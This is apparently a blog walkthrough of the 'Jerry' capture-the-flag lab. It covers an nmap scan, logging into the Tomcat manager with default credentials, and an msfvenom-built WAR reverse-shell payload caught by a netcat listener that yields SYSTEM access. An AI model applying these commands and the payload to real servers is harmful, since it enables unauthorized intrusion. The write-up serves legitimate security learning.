Jerry

Summary:

This was quite a straightforward and really easy web application. It provides the ability to practice the fundamentals of hacking which makes it just perfect for someone new to hacking.

Enumeration

Service Scan

We’re starting with a service scan to discover open ports, services and applications running in the background. So that we are aware of the infrastructure and possibly hidden services of interest that might let us disclose information or gain foothold.

$ nmap -A -p-65535 jerry               
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 05:22 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.40% done
Nmap scan report for jerry (10.10.10.95)
Host is up (0.049s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Port 8080

We’re greeted by a tomcat index page.

Network mapper returns a possible redirection going on, so I thought to run the web application through a Burp proxy and got interesting findings from the response message.

    <h3>Managing Tomcat</h3>
        <p>For security, access to the <a href="/manager/html">manager webapp</a> is restricted.
            Users are defined in
        </p>

        <pre> $CATALINA_HOME/conf/tomcat-users.xml </pre>
        <p>

Additionally, I ran a directory bruteforce to discover possibly hidden directories that could be used to our advantage.

By going to the discovered /manager directory, we are required to add credentials in order to authenticate. Upon clicking “cancel” button on firefox or chrome, we are redirected to a 401 page with default credentials as an example.

Typing the credentials into the authentication fields reveals default credential misconfiguration, and we are logged into the manager application.

In another hacking writeup, I remember exploiting the WAR file upload functionality to gain a shell. Herein, I am using “msfvenom” to create a file which when executed, will open a reverse shell connection to my netcat listener.

$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war -o thebigslap.war                      1 ⨯
Payload size: 13319 bytes
Final size of war file: 13319 bytes
Saved as: thebigslap.war

Open a netcat listener to catch the coming connection when after we deploy and open the war file.

$ nc -nvlp 1234                                                                          
listening on [any] 1234 ...

Upload the war file, click deploy button. The file should appear among the directories in the application form of the main page. Click on it, to open the file and check netcat for incoming connections. And beneath I display that I have system privileges:

  • “The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows”
$ nc -nvlp 1234                                                                          
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop\flags>type *
type *

2 for the price of 1.txt


user.txt
<FLAG:7004dbc...deleted>

root.txt
<FLAG:04a8b36...deleted>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: